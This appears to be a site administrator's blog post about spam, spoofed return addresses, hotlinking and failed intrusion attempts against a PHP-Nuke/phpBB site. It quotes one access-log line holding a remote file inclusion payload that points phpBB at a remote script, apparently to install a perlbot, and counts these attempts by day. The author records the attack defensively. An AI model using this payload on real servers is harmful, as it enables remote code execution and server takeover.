As I previously mentioned, there are people busy spamming every inch of the internet with all kind of links. I have renamed the submit-page and the feedback-page, just to keep them away. At first I started to block them on a daily basis, but I stopped at 757 different addresses. I must have done something right, because that's when another type of spam flowed into my mailbox: someone is sending spam with faked return email-addresses that point to this domain. So now I get all kinds of "delivery failed" messages. I rerouted all mail to non-existing users to an account that has it mail deleted after 7 days, so that takes care of those. Even virusses use this domain as a return-address, the virus is named W32.Mixor.q (Numar).

Some time ago, I added a captcha to the feedback-module and the submit-module. I've done this to prevent people robots from spamming me, as this is happening more and more.

Per day I see around 45 attempts to automatically post something. One other way to deal with automated spam, is renaming the feedback-module to something else or just adding a word that has to be retyped, if you're original the scripts won't work. For now, I have added the addresses to the ip-ban table nuke_banned_ip, so they can't try again. I'm working on a script that checks the apache logs for POST messages, filters out the feedback and submit pages and then sorts the ip-addresses. Of course I would have to manually filter out the messages I really received. To start of, I would use something like

grep POST /var/log/httpd/access* | egrep 'feedback|submit' | awk ' { print $2 } '| sort -u

Someone is trying very hard to install perlbot on this server, and he's using a real old exploit in phpbb. This is installed, but not active, so all attempts ( GET /modules/Forums/admin/admin_board.php?phpbb_root_path=http://www.cavcav.net/levo.dat? HTTP/1.1" 200 9746 "-" "libwww-perl/5.65" ) just fail, but the CMS keeps gently denying access.

11 attempts at nov-8
63 attempts at nov-9
112 attempts at nov-10, they appear 6 times per hour.

Just when jou think you've got everything covered, something unexpected pops up. Someone is linking to one of the sounds (this one) in a forum, so my server is serving this file to everyone who browses this thread. This file has become the most wanted file in just one-and-a-half hour, it has been requested over 500 times. I stopped this hotlinking by adding the wav-extension to the hotlinking-prevention-script.